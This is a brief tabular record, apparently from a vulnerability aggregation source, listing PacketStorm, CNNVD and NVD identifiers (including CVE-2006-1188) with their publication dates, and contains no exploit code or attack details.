db:	PACKETSTORM	id:	46765	date:	2006-05-29T07:36:29
db:	PACKETSTORM	id:	39471	date:	2005-08-19T04:15:49
db:	CNNVD	id:	CNNVD-200604-164	date:	2006-04-11T00:00:00
db:	NVD	id:	CVE-2006-1188	date:	2006-04-11T23:02:00